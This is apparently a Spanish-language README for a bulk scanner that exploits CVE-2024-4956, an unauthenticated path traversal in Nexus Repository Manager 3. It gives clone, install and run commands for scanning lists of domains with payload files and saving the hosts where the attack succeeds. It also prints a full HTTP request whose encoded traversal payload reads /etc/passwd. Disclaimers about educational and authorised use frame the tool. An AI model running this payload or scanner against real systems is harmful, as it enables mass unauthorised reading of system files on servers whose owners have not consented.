
[CVE-2024-4956] Escáner masivo de path traversal no autenticado para Nexus Repository Manager 3
Esta herramienta se proporciona únicamente con fines educativos y para pruebas en entornos corporativos. https://twitter.com/nav1n0x/ y https://github.com/ifconfig-me no se hacen responsables del mal uso de este código. Úsala bajo tu propio riesgo. No ataques un objetivo para el que no tengas permiso. Esta herramienta utiliza el payload publicado públicamente.
Este escáner ayuda a los entusiastas de la seguridad a escanear la vulnerabilidad de Path Traversal en objetivos de Nexus Repository de forma masiva.
El escáner mostrará la cantidad de objetivos cargados y el estado del escaneo actual. Las URLs se listarán con tres mensajes de estado: Tiempo de espera, Fallo o Éxito, según los resultados. Asegúrate de que targets.txt contenga la lista de dominios y lfi-payloads.txt contenga la lista de payloads. El escáner mostrará la URL que se está probando en ese momento, actualizándose con cada nueva solicitud, e indicará éxito o fracaso respectivamente. El script también guarda una lista de URLs exitosas en el directorio con el nombre successful_urls.txt. Proporcionará un resumen del número de intentos exitosos al final.
Asegúrate de tener Python 3.6+ y pip instalados.
Clona el repositorio:
git clone https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner.gitcd CVE-2024-4956-Bulk-ScannerInstala las dependencias necesarias:
pip install -r requirements.txt
Prepara tu archivo targets.txt con la lista de dominios y lfi-payloads.txt con la lista de payloads.
Ejecuta el escáner:
python3 CVE-2024-4956-scanner.py -d targets.txt -p lfi-payloads.txt
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: target.com:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close


Esta herramienta se proporciona únicamente con fines educativos y para pruebas en entornos corporativos. https://twitter.com/nav1n0x/ y https://github.com/ifconfig-me no se hacen responsables del código. Úsala bajo tu propio riesgo. No ataques un objetivo para el que no tengas permiso.